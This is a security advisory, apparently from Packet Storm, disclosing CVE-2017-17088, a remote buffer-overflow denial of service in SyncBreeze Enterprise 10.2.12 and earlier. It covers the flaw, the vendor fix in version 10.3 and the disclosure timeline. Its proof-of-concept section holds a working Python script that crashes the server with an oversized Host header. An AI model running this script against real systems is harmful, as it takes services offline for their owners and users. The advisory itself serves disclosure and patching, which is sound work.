Sync Breeze 10.2.12 Denial Of Service

2017-12-15T00:00:00
ID PACKETSTORM:145435
Type packetstorm
Reporter Manuel Garcia Cardenas
Modified 2017-12-15T00:00:00

Description

                                        
                                            `=============================================  
MGC ALERT 2017-007  
- Original release date: November 30, 2017  
- Last revised: December 14, 2017  
- Discovered by: Manuel GarcAa CA!rdenas  
- Severity: 7,5/10 (CVSS Base Score)  
- CVE-ID: CVE-2017-17088  
=============================================  
  
I. VULNERABILITY  
-------------------------  
SyncBreeze <= 10.2.12 - Denial of Service  
  
II. BACKGROUND  
-------------------------  
SyncBreeze is a fast, powerful and reliable file synchronization solution  
for local disks, network shares, NAS storage devices and enterprise storage  
systems.  
  
III. DESCRIPTION  
-------------------------  
The Enterprise version of SyncBreeze is affected by a Remote Denial of  
Service vulnerability.  
  
The web server does not check bounds when reading server request in the  
Host header on making a connection, resulting in a classic Buffer Overflow  
that causes a Denial of Service.  
  
To exploit the vulnerability only is needed use the version 1.1 of the HTTP  
protocol to interact with the application.  
  
IV. PROOF OF CONCEPT  
-------------------------  
#!/usr/bin/python  
import sys, socket  
  
host = sys.argv[1]  
buffer="GET / HTTP/1.1\r\n"  
buffer+="Host: "+"A"*2000+"\r\n\r\n"  
  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((host, 80))  
s.send(buffer)  
s.close()  
  
V. BUSINESS IMPACT  
-------------------------  
Availability compromise can result from these attacks.  
  
VI. SYSTEMS AFFECTED  
-------------------------  
SyncBreeze <= 10.2.12  
  
VII. SOLUTION  
-------------------------  
Vendor release 10.3 version  
http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.3.14.exe  
  
VIII. REFERENCES  
-------------------------  
http://www.syncbreeze.com/  
  
IX. CREDITS  
-------------------------  
This vulnerability has been discovered and reported  
by Manuel GarcAa CA!rdenas (advidsec (at) gmail (dot) com).  
  
X. REVISION HISTORY  
-------------------------  
November 30, 2017 1: Initial release  
December 14, 2017 2: Revision to send to lists  
  
XI. DISCLOSURE TIMELINE  
-------------------------  
November 30, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas  
November 30, 2017 2: Send to vendor  
December 6, 2017 3: Vendor fix the vulnerability and release a new version  
December 14, 2017 4: Send to the Full-Disclosure lists  
  
XII. LEGAL NOTICES  
-------------------------  
The information contained within this advisory is supplied "as-is" with no  
warranties or guarantees of fitness of use or otherwise.  
  
XIII. ABOUT  
-------------------------  
Manuel Garcia Cardenas  
Pentester  
  
`